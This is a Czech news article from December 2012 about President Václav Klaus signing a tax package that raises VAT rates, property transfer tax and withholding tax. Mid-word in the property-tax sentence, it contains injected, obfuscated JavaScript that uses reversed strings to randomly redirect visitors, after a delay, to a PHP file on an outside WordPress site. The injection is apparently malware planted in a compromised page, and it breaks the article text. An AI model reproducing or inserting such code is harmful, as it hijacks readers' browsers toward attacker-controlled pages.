Česká republika, daňový balíček, Klaus
Rainbow page separator

Prezident Václav Klaus podepsal daňový balíček

Pondělí, 24. prosince 2012

Obě sazby DPH se od 1. ledna 2013 zvýší o jeden procentní bod na 15 procent a 21 procent a v České republice se tak od příštího roku zdraží veškeré zboží a služby.

Úsporný balík Nečasovy vlády zvedne od 1. ledna 2013 na další tři roky sazby daně z přidané hodnoty na 15 a 21 procent. Poté by se měly sjednotit na 17,5 procentech. Prezident Václav Klaus daňový balíček, který Poslanecká sněmovna schválila už ve středu, dnes podepsal, i když už dříve zdůrazňoval, že se mu zvyšování daní příliš nelíbí.

Soubor šestnácti zákonů zavádí také sedmiprocentní zdanění lidí s vyššími příjmy v letech 2013 až 2015, omezuje výdajové paušály u živnostníků (např. lidé, kteří využívají výdajové paušály, nebudou moci uplatňovat daňové zvýhodnění na vyživované dítě a na manžela či manželku bez vlastních příjmů, pokud budou mít příjmy pouze z podnikatelské a jiné výdělečné činnosti) a ruší základní slevu na dani z příjmů fyzických osob pro pracující důchodce (v letech 2013 až 2015).

Zvýší se také daň z převodu nemovi["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tostí (ze současných tří procent na čtyři). Stropy pojistného na veřejné zdravotní pojištění se zruší pro roky 2013 až 2015. Rušení nemine ani „zelenou naftu“. Zákon pro příští rok sníží vratku části spotřební daně z nafty pro zemědělce z 60 na 40 procent a od roku 2014 ji zruší úplně.

U poplatníků, kteří mají sídlo v zahraničí, se od 1. 1. 2013 zvýší srážková daň z příjmů ze současných 15 procent na 35 procent.

Připravil: Ing. Aleš Blaha - PROFESIONÁLNÍ VEDENÍ ÚČETNICTVÍ